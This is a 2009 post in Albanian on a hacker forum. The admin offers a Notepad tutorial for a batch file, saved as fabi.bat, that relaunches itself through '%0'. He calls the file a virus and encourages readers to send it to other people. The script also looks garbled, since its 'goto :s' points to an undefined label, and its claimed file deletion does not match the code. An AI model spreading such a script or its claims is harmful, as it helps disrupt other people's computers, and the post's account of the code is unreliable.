Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Notepad trick is Virus'

Shko poshtë 
AutoriMesazh
Armend
Admin
Admin
avatar

Numri i postimeve : 433
Poenat e Antarit : 1591
Thanks : 16
Join date : 24/03/2009
Age : 26
Location : Kosova, Prishtin

MesazhTitulli: Notepad trick is Virus'   Fri Mar 27, 2009 12:50 pm

Shkojme me nje tuto vet e kom pregadit ket sen eshte pra virus.

Hapim nje Notepad dhe e shkruajm si vijon:

xemi
%0
goto :s

dhe shkojme file>>Save as>>Desktop
DHe e quajm apo ja leme emrin(Rename)fabi.bat

Por mos e hapeni ne PC tuaj sepse shkakton probleme ne:CMD,Disa file ja u Delete apo edh endonje pengese

RRezik:Eshte Virus kjo gje


Ju mund edhe tia qoni dikuj kete Virus...!!!
--
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://drenica.albanianforum.net
 
Notepad trick is Virus'
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: